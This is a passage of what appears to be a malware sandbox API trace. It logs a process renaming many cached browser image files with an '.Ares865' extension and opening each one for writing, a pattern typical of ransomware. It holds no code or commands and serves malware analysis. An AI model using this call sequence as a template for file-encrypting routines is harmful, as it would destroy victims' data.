lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.929] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2009) returned 1 [0094.932] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg.Ares865") returned 117 [0094.932] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.934] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2245) returned 1 [0094.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png.Ares865") returned 117 [0094.938] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png.ares865"), dwFlags=0x1) returned 1 [0094.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.940] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=61184) returned 1 [0094.947] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg.Ares865") returned 117 [0094.947] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13091) returned 1 [0094.953] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg.Ares865") returned 117 [0094.953] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.955] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2519) returned 1 [0094.960] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg.Ares865") returned 117 [0094.961] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.963] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11570) returned 1 [0094.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg.Ares865") returned 117 [0094.969] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.974] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2141) returned 1 [0094.977] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg.Ares865") returned 117 [0094.977] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6524) returned 1 [0094.983] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg.Ares865") returned 117 [0094.983] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.989] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2942) returned 1 [0094.991] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg.Ares865") returned 117 [0094.991] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.994] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6932) returned 1 [0094.999] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg.Ares865") returned 117 [0094.999] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.000] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10616) returned 1 [0095.008] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg.Ares865") returned 117 [0095.008] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.013] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11116) returned 1 [0095.023] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg.Ares865") returned 117 [0095.023] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9846) returned 1 [0095.027] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg.Ares865") returned 117 [0095.027] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2881) returned 1 [0095.039] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg.Ares865") returned 117 [0095.039] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.040] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9718) returned 1 [0095.044] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg.Ares865") returned 117 [0095.044] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.045] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2073) returned 1 [0095.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg.Ares865") returned 117 [0095.048] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.049] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2326) returned 1 [0095.052] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg.Ares865") returned 117 [0095.052] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 